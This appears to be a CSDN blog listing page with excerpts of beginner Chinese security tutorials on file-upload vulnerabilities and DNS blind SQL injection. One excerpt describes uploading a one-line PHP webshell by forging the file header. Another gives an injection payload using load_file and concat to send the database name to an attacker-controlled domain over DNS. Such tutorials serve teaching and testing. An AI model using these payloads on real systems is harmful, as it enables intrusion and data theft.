![](https://img-blog.csdnimg.cn/20201014180756925.png?x-oss-process=image/resize,m_fixed,h_64,w_64)
安全入门
黎明的影
这个作者很懒,什么都没留下…
展开
-
安全入门之文件操作2
一、简单的文件上传实例简单的文件上传二、绕过内容检查内容检查就是对用户上传的文件的文件内容进行分析,查看该文件是否符合上传规范。例如用户上传了一个php文件,程序在检查该php文件内容时没有找到符合规范的文件内容那么就不允许该文件的上传(如文件头等)。对于这样的检查,我们可以使用抓包工具来修改上传文件的文件头实现绕过,例如:下图为我们想要上传的文件,文件的内容是一句话木马。如果存在对文件内容的检查,因为该文件的文件内容不存在规范的文件头,所以一般是无法上传成功的。但其实我们只要在文件内容原创 2020-08-19 12:19:54 · 231 阅读 · 0 评论 -
安全入门之文件操作1
一、什么是文件上传文件上传漏洞是由于在用户上传文件时没有对用户上传的文件的后缀、类型等进行严格的限制。导致攻击者可以上传php等脚本文件,在远程服务器上执行,达到攻击的目的。...原创 2020-08-19 12:19:39 · 236 阅读 · 0 评论 -
SQL注入之DNS盲注
一、准备一个自己的域名利用DNS进行sql盲注需要一个拥有可以修改dns权限的域名,然后需要在你的DNS服务器上把需要注入的域名委托到攻击机上,也就是当请求你域名中的子域的解析请求都会解析到攻击机,然后我们在攻击机监听53端口即可。二、构造注入语句注入语句:http://域名/test.php?user=root' and load_file(concat('\\\\',(select database()),'添加的子域名\\aaa'))#可以利用sqlmap中的dns.py脚本监听53端原创 2020-07-28 10:24:41 · 288 阅读 · 0 评论